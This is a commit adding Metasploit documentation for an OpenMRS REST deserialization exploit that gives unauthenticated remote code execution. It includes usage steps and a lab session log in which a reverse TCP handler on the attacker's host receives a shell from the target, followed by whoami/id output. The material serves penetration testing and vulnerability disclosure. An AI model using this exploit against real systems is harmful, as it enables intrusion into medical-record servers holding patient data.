add docs
This commit is contained in:
Shelby Pace
@@ -0,0 +1,69 @@
|
||||
## Vulnerable Application
|
||||
|
||||
OpenMRS is an open-source platform that supplies
|
||||
users with a customizable medical record system.
|
||||
|
||||
There exists an object deserialization vulnerability
|
||||
in the `webservices.rest` module used in OpenMRS Platform
|
||||
for versions below `v2.24.0`. Unauthenticated remote code
|
||||
execution can be achieved by sending a malicious XML payload
|
||||
to a Rest API endpoint such as `/ws/rest/v1/concept`.
|
||||
|
||||
Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).
|
||||
|
||||
Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
|
||||
8 and Java 9.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/multi/http/openmrs_deserialization```
|
||||
4. Do: ```set TARGETURI <uri>```
|
||||
5. Do: ```set RHOSTS <ip>```
|
||||
6. Do: ```run```
|
||||
7. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
**ForceExploit**
|
||||
|
||||
Overrides the check result and runs the exploit.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Version of software and OS as applicable
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/http/openmrs_deserialization
|
||||
msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
|
||||
rhosts => 192.168.37.168
|
||||
msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
|
||||
targeturi => /openmrs-standalone
|
||||
msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/http/openmrs_deserialization) > check
|
||||
[*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
|
||||
msf5 exploit(multi/http/openmrs_deserialization) > run
|
||||
|
||||
[*] Started reverse TCP double handler on 192.168.37.1:4444
|
||||
[*] Target is running OpenMRS
|
||||
[*] Formatting payload
|
||||
[*] Sending payload...
|
||||
[*] Accepted the first client connection...
|
||||
[*] Accepted the second client connection...
|
||||
[*] Command: echo wKYK4x9ZOHJ37tm7;
|
||||
[*] Writing to socket A
|
||||
[*] Writing to socket B
|
||||
[*] Reading from sockets...
|
||||
[*] Reading from socket B
|
||||
[*] B: "wKYK4x9ZOHJ37tm7\r\n"
|
||||
[*] Matching...
|
||||
[*] A is input...
|
||||
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600
|
||||
|
||||
whoami
|
||||
space
|
||||
id
|
||||
uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
|
||||
```
|
||||
Reference in New Issue
Block a user